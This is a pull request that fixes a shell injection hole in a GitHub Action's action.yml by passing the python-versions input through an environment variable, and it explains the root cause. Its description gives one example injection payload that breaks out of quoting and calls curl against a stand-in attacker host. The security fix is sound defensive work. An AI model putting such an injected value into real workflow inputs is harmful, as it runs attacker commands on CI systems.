### PR TITLE
fix: use env var for python-versions input to prevent shell injection

### DIFF
--- a/action.yml
+++ b/action.yml
@@ -20,8 +20,10 @@ runs:
 
     - name: "Validate input"
       id: helper
+      env:
+        NOX_PYTHON_VERSIONS: ${{ inputs.python-versions }}
       run: >
-        '${{ steps.localpython.outputs.python-path }}' '${{ github.action_path }}/.github/action_helper.py' '${{ inputs.python-versions }}' >>${GITHUB_OUTPUT}
+        '${{ steps.localpython.outputs.python-path }}' '${{ github.action_path }}/.github/action_helper.py' "$NOX_PYTHON_VERSIONS" >>${GITHUB_OUTPUT}
       shell: bash
 
     - uses: actions/setup-python@v6


### PR DESCRIPTION
## Summary

This PR fixes a shell injection vulnerability in the `Validate input` step of `action.yml` caused by directly interpolating `${{ inputs.python-versions }}` inside a single-quoted shell argument.

## Root cause

GitHub evaluates `${{ }}` expressions **before** the shell parses the command. Single-quoted strings in bash look safe but the interpolation happens at the GitHub Actions layer — not the shell layer — so a value containing a single quote (`'`) terminates the quoting and what follows is parsed as shell syntax.

Example payload: `3.11' && curl attacker.com #`

The step is named "Validate input," which suggests intent to sanitize here, but the vulnerability exists at the expansion boundary before the shell is even invoked.

## Fix

The input is now assigned to an environment variable in the step's `env:` block and passed as a double-quoted env var reference (`"$NOX_PYTHON_VERSIONS"`) to the helper script. Environment variables are passed directly to the shell process and are never re-parsed.

```yaml
# Before
run: >
  '...' '.../action_helper.py' '${{ inputs.python-versions }}' >>${GITHUB_OUTPUT}

# After
env:
  NOX_PYTHON_VERSIONS: ${{ inputs.python-versions }}
run: >
  '...' '.../action_helper.py' "$NOX_PYTHON_VERSIONS" >>${GITHUB_OUTPUT}
```

## Impact

No behavior change. The helper script receives the same string value; only the delivery mechanism changes.